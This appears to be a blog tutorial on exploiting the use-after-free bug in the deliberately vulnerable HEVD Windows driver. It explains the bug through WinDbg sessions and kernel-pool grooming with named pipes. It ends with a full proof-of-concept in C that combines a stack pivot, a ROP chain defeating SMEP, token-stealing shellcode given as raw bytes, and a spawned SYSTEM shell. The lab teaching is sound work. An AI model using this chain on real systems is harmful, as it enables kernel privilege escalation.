PoolType
is the type of pool memory to allocate. By usingxor ecx, ecx
(1️⃣) it makes ECX register as zero, which means it’s a NonPagedPool (it cannot be paged out).NumberOfBytes
(2️⃣), as the name suggests is the number of bytes to allocate.Tag
(3️⃣), this is the pool tag for the allocated memory, this is ASCII character in reverse order, here it’s0x6B636148
which is “Hack” in reverse “kcaH”. The tag have a limit of 4 characters. The purpose of the tag is to determine if any memory is leaked. In user-mode application, if the application is force closed or crashed, kernel will clean up it’s memory but it’s not the case in kernel.
After the call to ExAllocatePoolWithTag()
, the return value (RAX) which is the pointer to the allocated region is copied to RDI register (4️⃣).
PVOID ExAllocatePoolWithTag(
[in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
[in] SIZE_T NumberOfBytes,
[in] ULONG Tag
);
Following that, it calls memset
1️⃣ which also takes 3 arguments. Using memset
it tries to fill the allocated region with A’s. Then it stores the pointer of the allocated region from RDI to a global variable g_UseAfterFreeObjectNonPagedPool
2️⃣.
Made a POC to make a call to AllocateUaFObjectNonPagedPool
function, let’s do some dynamic analysis:
- 1️⃣ call to
AllocateUaFObjectNonPagedPool
function and 2️⃣ is the call toExAllocatePoolWithTag()
API and 3️⃣ we can see all the 3 arguments where RDX is the size of the allocated region is 0x60 bytes. - Stepping over the call to
ExAllocatePoolWithTag()
, the return value RAX 4️⃣ holds the address of the newly allocated non-paged region. It’s filled with random chunks for now.
Moving on to the call to memset()
1️⃣, it also takes 3 arguments where RCX register is the pointer to the region allocated by ExAllocatePoolWithTag()
but with <Allocated_Region> + 0x8
as destination address (2️⃣) and stepping over the call, we can see (3️⃣) the region is filled with A’s. But it didn’t fill first 0x8 bytes, and the last 0x4 bytes, but fills the rest of them (0x54) with A’s. This could be a structure where first 8 bytes are used for something else and next 0x54 bytes are char type.
From IDA I couldn’t see much about whether it’s a structure or not, maybe the symbols are broken or something, so I checked the source code and ExAllocatePoolWithTag()
is actually type cast to USE_AFTER_FREE_NON_PAGED_POOL
structure. This structure contains 2 members, where the first member is a pointer (8 bytes) and next member is a char type of 0x54 bytes in size, so what we see above is correct.
typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
FunctionPointer Callback;
CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;
WinDBG has an extension !poolused
that displays all the memory based on the tag and you can also specify the tag and using !poolfind <TAG>
we can also find the specific tag but it will take a lot of time. We know that the above ExAllocatePoolWithTag()
call uses “Hack” as tag and I was able to find that as well.
1: kd> !poolused
unable to get nt!PspSessionIdBitmap
Using a machine size of ffe7f pages to configure the kd cache
*** CacheSize too low - increasing to 64 MB
Max cache size is : 67108864 bytes (0x10000 KB)
Total memory in cache : 10600 bytes (0xb KB)
Number of regions cached: 23
99 full reads broken into 110 partial reads
counts: 81 cached/29 uncached, 73.64% cached
bytes : 41949 cached/9120 uncached, 82.14% cached
** Transition PTEs are implicitly decoded
** Prototype PTEs are implicitly decoded
..
Sorting by Tag
NonPaged Paged
Tag Allocs Used Allocs Used
Hack 1 96 0 0 UNKNOWN pooltag 'Hack', please update pooltag.txt
[::]
FreeUaFObjectNonPagedPool
Now the second function is FreeUaFObjectNonPagedPoolIoctlHandler
which makes a call to FreeUaFObjectNonPagedPool
and it also does not take any arguments, so there will be no user input required for this call.
Inside FreeUaFObjectNonPagedPool
function:
- 1️⃣ Checks if the global variable
g_UseAfterFreeObjectNonPagedPool
is not null, recall inAllocateUaFObjectNonPagedPool
function, it stored the pointer of the allocated region (ExAllocatePoolWithTag()
) in the global variableg_UseAfterFreeObjectNonPagedPool
. - Since we already made the call to
AllocateUaFObjectNonPagedPool
, it won’t take the jump. - In 2️⃣ it makes a call to
ExFreePoolWithTag()
which deallocates a block of pool memory allocated with the specified tag. This takes 2 arguments which is the pointer to the region (RCX) 3️⃣ and the tag (Hack) (EDX) 4️⃣.
void ExFreePoolWithTag(
[in] PVOID P,
[in] ULONG Tag
);
This is where the first issue raises, after the call to ExFreePoolWithTag()
, it deallocates the block but it didn’t NULL the g_UseAfterFreeObjectNonPagedPool
global variable.
Started dynamic analysis on FreeUaFObjectNonPagedPool
function:
- 1️⃣
HEVD+0x83008
is the global variable which holds the address of the allocated region. - 2️⃣ Begins the
ExFreePoolWithTag()
call and it takes 2 arguments (3️⃣) which takes the address of the allocated region and the Tag (”Hack”). - 4️⃣ We can also confirm that the region holds the A’s which was assigned using
memset()
inAllocateUaFObjectNonPagedPool
. - Stepping over the call, by checking the region again (5️⃣) it’s freed.
- But the issue here is the global variable (
g_UseAfterFreeObjectNonPagedPool
) is not set to NULL and we can see (6️⃣) it still holds the pointer to the region.
UseUaFObjectNonPagedPool
Moving on to the next step, UseUaFObjectNonPagedPoolIoctlHandler
function calls to UseUaFObjectNonPagedPool
, like previous function calls it also does not take any arguments.
Inside UseUaFObjectNonPagedPool
function,
- (1️⃣) It checks if the global variable (
g_UseAfterFreeObjectNonPagedPool
) is not null, if not, it won’t take the jump, then (2️⃣) it copies the global variable (g_UseAfterFreeObjectNonPagedPool
) to RAX register. - And (3️⃣) dereference the RAX to RCX register, which means it copies the first 8 bytes of value in the allocated region to RCX register. Finally it calls the RCX register (4️⃣).
- This means whatever placed in first 8 bytes of the global variable (
g_UseAfterFreeObjectNonPagedPool
) will be called by the driver. If you recall earlier, we saw it’s aUSE_AFTER_FREE_NON_PAGED_POOL
structure where first member is a pointer (8 bytes), so basically it executes that pointer. - This leads to UAF vulnerability by re-using the same pointer without it sets to NULL.
Let’s dynamically test this now, by calling AllocateUaFObjectNonPagedPool
first and then call UseUaFObjectNonPagedPool
, we don’t want to free the memory now. We just want to know if the first 8 bytes can be invoked.
Placed breakpoint on the call to UseUaFObjectNonPagedPool()
(1️⃣) and another breakpoint where it copies the global variable (g_UseAfterFreeObjectNonPagedPool
) to RAX register (2️⃣). We can also check the global value (3️⃣) and it contains the A’s and the first 8 bytes contains some pointer (4️⃣). Moving forward it performs the dereference (5️⃣) and copies the first 8 bytes to RCX register and we can also confirm that by checking the RCX register (6️⃣) and finally it makes a call to RCX register (7️⃣).
Now that we have basic understanding of how these functions work, we need to begin the attack by allocating the memory using AllocateUaFObjectNonPagedPool
and then free that using FreeUaFObjectNonPagedPool
, now the memory is freed but the global variable (g_UseAfterFreeObjectNonPagedPool
) still holds the pointer to that address, so we somehow re-claim the freed memory and place our payload and then finally call UseUaFObjectNonPagedPool
which will call the pointer (first 8 bytes) in the global variable (g_UseAfterFreeObjectNonPagedPool
).
AllocateFakeObjectNonPagedPool
We need to somehow re-claim the freed memory, there is a function called AllocateFakeObjectNonPagedPoolIoctlHandler
, which takes user argument (1️⃣) from _IO_STACK_LOCATION
structure, if you recall in previous posts I explained that _IO_STACK_LOCATION + 0x20
is DeviceIoControl→Type3InputBuffer
which is the user input and then it makes the call to AllocateFakeObjectNonPagedPool
function.
The pointer to user input (UserFakeObject) is stored to RSI register:
Moving on, there is ExAllocatePoolWithTag()
call and it takes 3 arguments which are pretty similar to what we saw previously:
PoolType
is the type of pool memory to allocate. By usingxor ecx, ecx
(1️⃣) it makes ECX register as zero, which means it’s a NonPagedPool (it cannot be paged out).NumberOfBytes
(2️⃣), as the name suggests is the number of bytes to allocate.Tag
(3️⃣), this is the pool tag for the allocated memory, this is ASCII character in reverse order, here it’s0x6B636148
which is “Hack” in reverse “kcaH”.- After the call, the return value EAX (5️⃣) is stored to RDI register.
Moving forward, it makes a call (1️⃣) to ProbeForRead() which checks that a user-mode buffer actually resides in the user-space and accessible. As we can see it provides the UserFakeObject
(the user input == RSI) as the Address to check.
Then comes a whole lot of copy stuff (2️⃣):
- It uses XMM registers here, which are 16 bytes (0x10) registers.
- MOVUPS instruction its like normal MOV instruction to copy values but specifically used for XMM registers.
- Let’s start with first MOVUPS instruction, we already know RSI holds the user input, basically it copies first 16 bytes of user input to XMM0 register. Then from XMM0 register it copies to RDI which is the address of the NonPaged pool allocated in previous step using
ExAllocatePoolWithTag()
. - Then it copies the next 16 bytes of user input to XMM1 register and from XMM1 to
RDI+0x10
, basically copies the user-input to the newly allocated region. - In the rest of the instructions it copies the remaining user input, but at the end it copies QWORD of
RSI + 0x50
(which is 8 bytes) to XMM1 register. Then it copies from XMM1 to theRDI + 0x50
using MOVSD instruction which means copy lower 8 bytes, because XMM1 is 16 bytes but in previous instruction we just copied 8 bytes (QWORD) - And adds a null byte at the end of buffer (3️⃣). This concludes, it copies total of 88 bytes (0x58 bytes) of user input.
Let’s try this out, this time, I am just calling AllocateFakeObjectNonPagedPool
function and see how it goes. From the copy process using XMM registers, it copies 0x58 bytes of user inputs, so I sent 88 bytes (0x58) of A’s and see how it goes.
CHAR buffer[88];
memset(buffer, 'A', 88);
success = DeviceIoControl(
hDriver,
ALLOCATE_FAKE_NON_PAGED,
buffer,
sizeof(buffer),
nullptr,
0,
nullptr,
nullptr);
Placed the breakpoint on the ExAllocatePoolWithTag()
(1️⃣) and got the hit, checking the parameters (2️⃣), we can see the second argument (RDX = NumberOfBytes
) is 0x58 bytes (88 bytes), so now it makes sense, it allocates 0x58 bytes of NonPagedPool and copy the same amount of user input to this region.
Stepping over the call, RAX holds the address (3️⃣) of the nonpaged allocated region and checking that region contains chunks (4️⃣ explained more about this later).
Moving on to ProbeForRead()
call (1️⃣), the RCX register (2️⃣) holds the user-space address which contains the A buffer we sent (3️⃣).
Then we enter the copy operation, it copies first 16 bytes of user input to XMM0 register (1️⃣), then if we check (2️⃣) the XMM0 register, we can see it holds the 16 bytes of A’s and it copies to NonPagedPool region (3️⃣). We can also confirm by checking the RDI register where the first 16 bytes are overwritten by our input (4️⃣).
Finally, it copies the null terminator (1️⃣) to the end of the buffer and we can also confirm it (2️⃣).
So AllocateFakeObjectNonPagedPool
function help us to allocate a NonPagedPool region of 0x58 bytes and copy user input buffer to that newly allocated region. But how can we use this functionality to re-claim the freed memory?
Before that, we need to know a little bit about memory management.
As I explained earlier, VirtualAlloc()
allocates memory in a page (4KB) and allocating a whole page for a small chunk of memory (like 50 bytes) would be highly inefficient and wasteful. To address this Heap Manager is introduced which allocate memory in smaller bytes of the required memory instead of whole page. In user-mode it’s called as Heap and it's a dynamic allocation memory, meaning it can be extended (or shrink) when required. Such example is malloc
.
Like user-space heap, for kernel-space it’s called Kernel Pool, it is also a dynamic allocation memory, the pool is the heap reserved to the kernel land. There are two distinct types of pool memory: paged and non-paged. As you already know:
- Paged Pool: This memory that can be swapped to disk when not in use.
- Non-Paged Pool: This memory is guaranteed to reside in physical memory at all times.
For allocating memory in the pool, the main functions for allocating is ExAllocatePoolWithTag()
and freeing memory is ExFreePoolWithTag()
, in the Windows kernel.
If you recall earlier, ExAllocatePoolWithTag()
has a member called PoolType
which is a POOL_TYPE
enum. As you can see below, there are multiple Pool types but most them are just the variants of NonPagedPool
or PagedPool
. For example NonPagedPoolNx
is no-execute (NX) nonpaged pool.
Microsoft suggests not to use
ExAllocatePoolWithTag()
anymore, it has been deprecated in Windows 10, version 2004 and has been replaced by ExAllocatePool2.
When we NonPagedPool is allocated, the memory manager will decide the pool region for the allocated memory. A pool region refers to a larger contiguous section of memory. Inside this pool region, it contains small chunks/blocks of allocated memory.
Once we allocate 0x60 bytes using AllocateUaFObjectNonPagedPool
function, we can check the address of the allocated region using !pool
command. As you can see it says the region is Nonpaged pool and shows a whole lot of other blocks in the region and this pool region contains our allocated block as well.
Also as you might noticed the size is 0x70 of “Hack”, this is because each pool chunk is prepended with a 0x10
bytes of _POOL_HEADER
. This is like a metadata for the chunk, as you can see there is PoolTag
and ProcessBilled
is a pointer to EPROCESS
structure of the process that made the allocation.
//0x10 bytes (sizeof)
struct _POOL_HEADER
{
union
{
struct
{
USHORT PreviousSize:8; //0x0
USHORT PoolIndex:8; //0x0
USHORT BlockSize:8; //0x2
USHORT PoolType:8; //0x2
};
ULONG Ulong1; //0x0
};
ULONG PoolTag; //0x4
union
{
struct _EPROCESS* ProcessBilled; //0x8
struct
{
USHORT AllocatorBackTraceIndex; //0x8
USHORT PoolTagHash; //0xa
};
};
};
When memory region is dynamically allocated and then freed, it goes into a “free page list”. These free pages are still holding some information they’ve held when they were being used or it can be chunks too. And if Kernel or Kernel drivers looking for some physical memory (NonPagedPool) it will be taken from free page list. This is to reduce the overhead of frequent memory allocation and deallocation.
So that means, AllocateUaFObjectNonPagedPool
allocates 0x60 bytes and we free that using FreeUaFObjectNonPagedPool
, and after that we allocate 0x58 bytes using AllocateFakeObjectNonPagedPool
, there might be a chance from the free page list, we may or may not get the same block.
Trying this out, we can see the blocks are almost nearby so atleast from same pool region. But this is not enough to exploit this vulnerability.
Exploitation
To exploit this UAF vulnerability and re-claim the freed memory, we will be using a technique called Kernel FengShui, added the reference below with all articles based on this. We are gonna specifically follow this methodology:
Source: https://elhacker.info/manuales/Análisis de malware/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf
Using Kernel Fengshui or Kernel Grooming technique, we try to allocate NonPaged blocks/chunks using kernel objects with the same size as what we are trying to re-claim, in our case it’s 0x60 bytes. So we need to find a kernel object which is almost the similar size of it. There is an excellent research by Alex Ionescu on Kernel Fengshui. Using CreatePipe() and WriteFile() API it’s possible to create a “File” kernel object and we can also adjust the size of the allocation and this object will be allocated with a tag: “NpFr”.
To try this out, I created the following script:
- To check how many bytes we can allocate, I started with 0x20 bytes of A’s.
- Also, placed 2
getchar()
before and afterWriteFile()
API. We need to determine the allocation size, because the named pipe will prefix our buffer with its own internal header, which is calledDATA_ENTRY
. And it’s an undocumented structure, so we need to determine it’s size as well.
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
int main() {
HANDLE rPipe;
HANDLE wPipe;
DWORD outLength;
CHAR buffer[0x20];
memset(buffer, 'A', 0x20);
if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
printf("Error: CreatePipe");
}
printf("CreatFile Handle : 0x%llx\n", rPipe);
getchar();
printf("WriteFile Handle : 0x%llx\n", wPipe);
if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
printf("Error: WriteFile");
}
getchar();
}
Executed the script and after the execution of CreatePipe()
, I checked the NpFr
tag pool and it’s empty. Because we didn’t write it yet.
0: kd> !poolused 1 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
Sorting by Tag
NonPaged Paged
Tag Allocs Frees Diff Used Allocs Frees Diff Used
NpFr 6315 6315 0 0 0 0 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys
TOTAL 6315 6315 0 0 0 0 0 0
Stepping forward to the execution of WriteFile()
, we can see it’s allocated with 96 bytes (0x60). And we allocated 0x20 bytes of A’s which means the DATA_ENTRY
is of 0x40 bytes in size.
0: kd> !poolused 2 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
Sorting by NonPaged Pool Consumed
NonPaged Paged
Tag Allocs Used Allocs Used
NpFr 1 96 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys
TOTAL 1 96 0 0
Also, it might be confusing to see !poolused
command shows in decimal value but !pool
command shows in hexadecimal. To clear this I also checked the Hack
tag using !poolused
and it’s clear it follows decimal (112 bytes == 0x70 bytes).
Now that we can control the size of the pool, we need to increase our buffer to 0x30 bytes and then the Nonpaged pool will be 0x70 bytes. If you recall earlier, every block is prepended with _POOL_HEADER
structure (0x10), so we need to allocate some space for that too. But why we are doing this again? We are trying to create a replication of “Hack” tag pool and then we can use the Kernel Fengshui technique.
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
int main() {
HANDLE rPipe;
HANDLE wPipe;
DWORD outLength;
CHAR buffer[0x30];
memset(buffer, 'A', 0x30);
if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
printf("Error: CreatePipe");
}
printf("CreatFile Handle : 0x%llx\n", rPipe);
printf("WriteFile Handle : 0x%llx\n", wPipe);
if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
printf("Error: WriteFile");
}
getchar();
}
Now everything seems good:
This is what we gonna do:
- First we gonna allocate lot of DATA_ENTRY objects of 0x70 bytes using CreatePipe() and WriteFile() API. This can be done by calling these APIs a definite number of times. This process is called Defragmentation, which helps to reorganizing the data of related pieces to be placed together in a contiguous sections.
- Followed that we gonna allocate a few more DATA_ENTRY objects and we expect in this process that all the objects are stored in sequential.
- Then we free every second DATA_ENTRY object of the sequential allocations only to create holes.
- Finally we allocate the 0x60 bytes of Hack using
AllocateUaFObjectNonPagedPool
, we hope this lands in one of the holes we placed. And this region address is stored in the global variable (g_UseAfterFreeObjectNonPagedPool
).
- And free that memory using
FreeUaFObjectNonPagedPool
, but the global variable (g_UseAfterFreeObjectNonPagedPool
) is not set to NULL which still holds the pointer to the region (blue).
- Then we allocate a lot of the malicious object using
AllocateFakeObjectNonPagedPool
and fill every holes where one of the hole is the address ofg_UseAfterFreeObjectNonPagedPool
and finally execute it usingUseUaFObjectNonPagedPool
.
To begin with, we need to call the CreatePipe()
and WriteFile()
APIs a definite number of times. This for
loop repeatedly calls these APIs for HANDLE_COUNT
iterations.
for (int i = 0; i < HANDLE_COUNT; i++) {
if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
printf("Error: CreatePipe failed at iteration %d\n", i);
break;
}
if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
printf("Error: WriteFile failed at iteration %d\n", i);
break;
}
}
We can create the hole by closing every second handle:
for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
if (i % 2 == 0) {
CloseHandle(srPipes[i]);
CloseHandle(swPipes[i]);
}
}
We know that UseUaFObjectNonPagedPool
executes a pointer from g_UseAfterFreeObjectNonPagedPool
. So, when creating a fake object using AllocateFakeObjectNonPagedPool
, I filled it with B’s to see if I can make it execute that. This also needs to be done a definite number of times (ALLOCATE_HANDLE_COUNT
) to fill every hole, with one of the holes being the pointer g_UseAfterFreeObjectNonPagedPool
.
printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
printf("[+] Filling the holes with fake objects..\n");
CHAR buffer[0x58];
memset(buffer, 'B', 0x58);
for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
success = DeviceIoControl(
hDriver,
ALLOCATE_FAKE_NON_PAGED,
buffer,
sizeof(buffer),
nullptr,
0,
nullptr,
nullptr);
}
Placed a breakpoint on the UseUaFObjectNonPagedPool
function when it executes the pointer from g_UseAfterFreeObjectNonPagedPool
and when I run it first time, the RCX is not overwritten but when I re-run the code, it worked and overwritten the RCX.
I used the same fake stack pivot method as what I explained in type confusion vulnerability. So that UseUaFObjectNonPagedPool
will execute our stack pivot gadget and pivot to user-space and then execute the rest of the ROP gadgets which will bypass the SMEP & VBS (HVCI is disabled in this scenario) and spawn SYSTEM shell.
The defragmentation and allocation process sometimes takes 1 or 2 attempts but that won’t crash the machine, but IRQL_NOT_LESS_OR_EQUAL
crash occurs after the execution of stack pivot but as I explained earlier it’s not always, only when the IRQL is higher and we can still execute our shellcode in user-space.
Final POC:
#include <Windows.h> #include <stdio.h> #include <psapi.h> #define ALLOCATE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS) #define FREE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS) #define USE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS) #define ALLOCATE_FAKE_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS) #define HANDLE_COUNT 20000 #define ALLOC_HANDLE_COUNT 80000 #define FAKE_ALLOC_COUNT ALLOC_HANDLE_COUNT / 2 int fengshui() { HANDLE* rPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE)); HANDLE* wPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE)); HANDLE* srPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE)); HANDLE* swPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE)); if (rPipes == NULL || wPipes == NULL || srPipes == NULL || swPipes == NULL) { printf("Error: Memory allocation failed\n"); return 1; } CHAR buffer[0x30]; DWORD outLength; memset(buffer, 'A', sizeof(buffer)); printf("[+] Phase I: Performing Defragmentation for the object....\n"); for (int i = 0; i < HANDLE_COUNT; i++) { if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) { printf("Error: CreatePipe failed at iteration %d\n", i); break; } if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) { printf("Error: WriteFile failed at iteration %d\n", i); break; } } printf("[+] Phase II: Allocating objects in sequence....\n"); for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) { if (!CreatePipe(&srPipes[i], &swPipes[i], NULL, sizeof(buffer))) { printf("Error: CreatePipe failed at iteration %d\n", i); break; } if (!WriteFile(swPipes[i], buffer, sizeof(buffer), &outLength, NULL)) { printf("Error: WriteFile failed at iteration %d\n", i); break; } } printf("[+] Phase III: Creating holes in the pool...\n"); for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) { if (i % 2 == 0) { CloseHandle(srPipes[i]); CloseHandle(swPipes[i]); } } //free(rPipes); //free(wPipes); //free(srPipes); //free(swPipes); return 0; } PVOID getbaseaddress() { BOOL status; LPVOID* pImageBase; DWORD ImageSize; status = EnumDeviceDrivers(nullptr, 0, &ImageSize); pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize); LPVOID ntaddr = pImageBase[0]; return ntaddr; } uintptr_t MiGetPte(LPVOID lpMemory) { uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory); uintptr_t calc1 = addr >> 9; // shr rcx, 9 uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx return calc2; } int main() { NTSTATUS success; printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } printf("[+] Performing Pool grooming...\n"); fengshui(); printf("[+] Calling AllocateUaFObjectNonPagedPool...."); success = DeviceIoControl( hDriver, ALLOCATE_UAF_NON_PAGED, nullptr, 0, nullptr, 0, nullptr, nullptr); printf("success\n"); printf("[+] Calling FreeUaFObjectNonPagedPool...."); success = DeviceIoControl( hDriver, FREE_UAF_NON_PAGED, nullptr, 0, nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed: %d\n", GetLastError()); } LPVOID nt_addr = getbaseaddress(); printf("[+] Nt base address: %p\n", nt_addr); BYTE shellcode[256] = { 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); printf("[+] Shellcode address: %p\n", lpMemory); memcpy(lpMemory, shellcode, sizeof(shellcode)); uintptr_t ShellcodePte = MiGetPte(lpMemory); printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte); printf("[+] Calling AllocateFakeObjectNonPagedPool....\n"); printf("[+] Filling the holes with fake objects..\n"); CHAR buffer[0x58]; *(LPVOID*)(buffer) = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret memset(buffer + 0x8, 'B', 0x50); uintptr_t STACK_PIVOT = 0x83000000; LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); printf("[+] Allocated region: %p\n", fakeStack); if (!VirtualLock(fakeStack, 0x10000)) { printf("Error using VirtualLock: %d\n", GetLastError()); } memset((LPVOID)fakeStack, 0x10000, '\x41'); int index = 0; *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13 *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4 *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) { success = DeviceIoControl( hDriver, ALLOCATE_FAKE_NON_PAGED, buffer, sizeof(buffer), nullptr, 0, nullptr, nullptr); } printf("[+] Calling UseUaFObjectNonPagedPool...."); success = DeviceIoControl( hDriver, USE_UAF_NON_PAGED, nullptr, 0, nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed: %d\n", GetLastError()); } printf("[+] Spawning a shell with elevated privileges\n\n"); system("cmd"); // close handle printf("[+] Closing handle\n"); CloseHandle(hDriver); }
References:
Type Confusion:
- https://wafzsucks.medium.com/how-a-simple-k-typeconfusion-took-me-3-months-long-to-create-a-exploit-f643c94d445f
- https://vuln.dev/windows-kernel-exploitation-hevd-x64-type-confusion/
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
Use-After-Free:
- https://www.exploit-db.com/docs/english/16032-kernel-pool-exploitation-on-windows-7.pdf
- https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf
- https://www.alex-ionescu.com/kernel-heap-spraying-like-its-2015-swimming-in-the-big-kids-pool/
- https://securityinsecurity.github.io/exploiting-hevd-use-after-free/
- https://vuln.dev/windows-kernel-exploitation-hevd-x64-use-after-free/